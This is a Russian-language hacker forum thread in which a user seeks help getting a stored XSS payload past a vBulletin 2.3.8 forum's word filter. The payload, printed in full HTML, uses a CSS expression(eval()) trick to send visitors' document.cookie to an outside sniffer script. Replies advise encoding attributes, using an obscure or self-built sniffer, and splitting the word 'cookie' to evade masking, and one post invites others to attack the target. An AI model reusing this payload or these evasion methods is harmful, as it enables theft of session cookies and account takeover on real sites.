Такое дело прописываю эту xss(изложено в этой теме http://forum.antichat.ru/showthread.php?t=5469) в форуме vBulletin версии 2.3.8 а она заменяется на такую вот хню aaa@aaa.aa"'s='' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));, появляются эти звёздочки. Кто нить может мне помочь, может её можно как нить запрятать.

Чуток не понятно что ты хочешь, но если тебе нужно обойти фильтры в параметрах...то используй эту ссылку для шифровки.

http://ha.ckers.org/xss.html

А вообще исходный код страницы дай.. :rolleyes:

Чуток не понятно что ты хочешь, но если тебе нужно обойти фильтры в параметрах...то используй эту ссылку для шифровки.

http://ha.ckers.org/xss.html

А вообще исходный код страницы дай.. :rolleyes:

Тыпрочитай тему которую я указал выше.

http://ha.ckers.org/xss.html
А где тут именно шифровать я не пойму?

А где тут именно шифровать я не пойму?
Character Encoding Calculator

тут... :rolleyes:

Resylitat koda svoego dai. Chto vidno v HTML?
<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));</font></p>

<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));</font></p>


http://ha.ckers.org/xss.html

Берешь эту ссылку, и кодируешь параметры своих атрибутов. :rolleyes:

<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));</font></p>


http://ha.ckers.org/xss.html

Берешь эту ссылку, и кодируешь параметры своих атрибутов. :rolleyes:
А какой брать код HTML (with semicolons) или HTML (without semicolons)?

Не выходит, пишет как простой текст.

если заменяет на звездочки значит чел, фильтрует через фильтр матов, тоесть вписываешь туда слова и он их заменяет на *
Секешь к чему я?
src='http://********
если он такое делает, значит он обрезает твой сайт, допустим многие форумы стали добавлять в мат античатовский сниффер, решаеться это "навождение косых умов" очень просто, ищещь не распространненый особо сниффер, в конце концов можешь сделать сам. пробобуй здесь netsec.ru там тебе персональный сниф дадут

если заменяет на звездочки значит чел, фильтрует через фильтр матов, тоесть вписываешь туда слова и он их заменяет на *
Секешь к чему я?

если он такое делает, значит он обрезает твой сайт, допустим многие форумы стали добавлять в мат античатовский сниффер, решаеться это "навождение косых умов" очень просто, ищещь не распространненый особо сниффер, в конце концов можешь сделать сам. пробобуй здесь netsec.ru там тебе персональный сниф дадут
а как быть с cookie, тоже заменяет на звёздочки . ****ie

а cookie надо кодировать, вставлять табуляуцию, эксперементировать с /

а cookie надо кодировать, вставлять табуляуцию, эксперементировать с /
Братишка я мало в это понимаю не мог бы мне помочь, попробуй ломани их ...

Спасибо всем... Я разобрался....